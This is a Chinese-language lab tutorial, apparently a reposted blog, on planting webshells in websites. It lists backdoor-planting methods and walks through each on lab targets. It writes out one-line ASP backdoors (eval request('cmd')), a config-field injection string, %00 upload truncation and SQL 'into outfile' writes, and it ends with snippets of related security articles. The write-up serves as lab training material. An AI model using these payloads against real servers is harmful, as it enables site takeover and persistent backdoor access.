摘要:常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起,然后就可以使用浏览器来访问该后门文件了,从而得到一个命令执行环境,以达到控制网站服务器的目的。
顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上的操作权限。webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。
更详细的解释参见:Webshell和一句话木马
通过修改模块写入一句话,网站再调用模板的时,会自动加载这个模板,运行后门。
通过后台的上传模块,上传网页后门,就可以拿到webshell
通过可控参数将恶意代码写入文件里,即可获取webshell
上传zip文件,在其加入webshell文件,程序会自动解压,将后门解压到网站目录,可以获取webshell。
通过修改网站的配置文件,直接把后门写到网站里
有的网站后台会存在远程图片下载功能,但是没有对其后缀名进行限制,导致可以下去webshell文件。
很多的asp网站 都存在备份功能,上传有恶意的图片,备份成脚本文件,即可获取webshell
有的网站存在sql执行命令,可以通过命令备份或导出一句话后门到指定网站目录,即可获取webshell
使用命令进行读写文件
入后门,即可获取webshell
有的编辑器存在上传漏洞,通过编辑器漏洞可以获取网站的webshell。
使用内部靶场 12server6 ,以NAT模式运行,设定为自动获取DNS、ip。之后启动护卫神-主机大师即可。
物理机修改hosts文件绑定靶机的地址即可。
在“外观”-“编辑”页面,随意选择一个主题,随意选择一个后缀是php的模板,然后写入一句话木马。这里写入的是,加上phpinfo主要是为了方便获知效果。
去靶机后台看看,确实写入成功。文件路径:
C:/Hws.com/HwsHostMaster/wwwroot/www.cbi1.com/web/wp-content/themes/twentysixteen/404.php
保存模板,然后访问路径。根据文件路径,可以反推出其url地址:
(或者可以百度下“外观”-“编辑”的地址,或者自己本地搭建一下环境,获知地址)
http://www.cbi1.com/wp-content/themes/twentysixteen/404.php
看到我们预留的phpinfo页面,说明地址没问题,然后连接webshell管理工具。
连接蚁剑,呃……页面显示有问题,切换成别的编码方式依然失败。gg
连接菜刀
访问“模块”-“默认模板管理”,这里选择 index.htm页面,点击“修改”
那么,浏览器一路后退到更新页面,后缀保持为之前的html,再看看原本的效果
再打开就是原本的正常主页了,只不过在页面源代码中可以看见预留的一句话木马内容
准备个一句话木马:
访问地址:http://www.cbi2.com/dede/
去靶机后台瞅瞅,传上去了
访问一下webshell地址,看到我们预留的phpinfo页面了,说明地址没问题
连接菜刀成功。
<%eval request("cmd")%>
在路径后面添加 hack.asp%00 ,并对%00编码
进行URL编码之后,正常情况下应该出现一个有点像汉字“口”的东西,如果没有出现,就说明哪里出问题了。
(也完全可能是编码成功,只是字体原因导致的这种显示结果)
换个版本的BurpSuite,并重置一下BurpSuite。显示出“口”了,然后修改一下文件后缀,上传失败。
上网查了一下,是文件内容太少了,填充些垃圾数据,重新上传。
随便填点东西,一句话木马:
获取页面地址
再次点击“上传”按钮后,上传成功
访问以下文件地址,看到了预留的phpinfo页面
成功连接菜刀
在“外观”-“主题”页面,通过“添加”按钮添加zip类型的主题,之后网站会对其解压。
我们可以上网上找主题,或者直接改个名字来套用网站的主题。我这里选择后者。
把网站后台的 twentysixteen 主题拿过来改个名字为 hackyou,确认404.php 文件里存在一句话木马,然后将hackyou文件夹打包成zip,上传网站。
去靶机后台瞅一眼。上传成功了
访问webshell地址
连接webshell管理工具
通过以下位置来上传文件
<%eval request("cmd")%>
http://www.cbi9.com/templates/hack/hack.asp
smtp服务器的框中,写入:smtp.163.com"%><%eval request(chr(35))%><% s="
连接菜刀:
直接写入一句话木马
连接菜刀
参见之前的文章:https://blog.csdn.net/weixin_44288604/article/details/120680334
换用自己的win7靶机
方式同第8节,只不过这里不是在,存在sql注入的位置写,而是去phpmyadmin中写
select "" into outfile "C:/phpStudy/www/hack.php"
页面有我们预留的phpinfo
连接菜刀
方式1:点击“编辑”按钮,直接编辑
方式2:通过执行SQL语句来进行修改
select ""
执行成功
看到预留的phpinfo页面
连接菜刀成功
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/124700.html
摘要:目录黑吃黑箱子环境准备马中马预防后门反杀黑吃黑箱子什么是箱子通俗一点的解释它可以让你在中植入后门,当别人用你植入过后门的去获取渗透别的网站时,你的信封将会收到他留下的后门地址以及密码环境准备搭建一个的服务器,我们这里选用 ...
摘要:后渗透模块该模块主要用于在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息实施跳板攻击等。我将通过一个完整的渗透测试来进行框架的初步讲解,这是我在一次实战中的操作,我用虚拟机进行了简单的模拟。其中,是被迁徙的进程。 ...
摘要:是一款精简的基于命令行的管理工具,它有着多种发送方式和编码方式,以及精简的代码,使得它成为隐蔽的暗杀者,难以被很好的防御。AssassinAssassin是一款精简的基于命令行的webshell管理工具,它有着多种payload发送方式和编码方式,以及精简的payload代码,使得它成为隐蔽的暗杀者,难以被很好的防御。自用工具开源互相学习,工具短小精悍,生成的webshell能够过目前主流杀...
摘要:本章主要以常见的数据集为例子介绍基于文件特征的检测技术。由国内后知名创业者钟胜辉网名淡淡风于年创办,是国内知名的站长建站工具。年,创办人钟胜辉离开,创办国内针对媒体领域的产品思拓合众。 GitChat 作者:兜哥原文: 基于机器学习的 Webshell 发现技术探索关注公众号:GitChat 技术杂谈,一本正经的讲技术 第十一章WebShell检测 WebShell就是以ASP、PHP...
摘要:该漏洞无需经过身份验证即可远程利用,攻击复杂度低,且无需用户交互。目前已经检测到攻击者正在扫描和攻击存在漏洞的服务器。 目录 漏洞描述 影响版本 漏洞批量检测poc 漏洞EXP 修复建议 声明:切勿用于非法入侵,仅供检测与学习!传送门 ——> 中华人民共和国网络安全法 漏洞描述 2021年9...
阅读 2200·2021-11-24 09:38
阅读 705·2021-11-15 17:58
阅读 3393·2021-11-12 10:36
阅读 3552·2021-09-22 16:06
阅读 686·2021-09-10 10:50
阅读 1193·2019-08-30 11:19
阅读 3177·2019-08-29 16:26
阅读 790·2019-08-29 10:55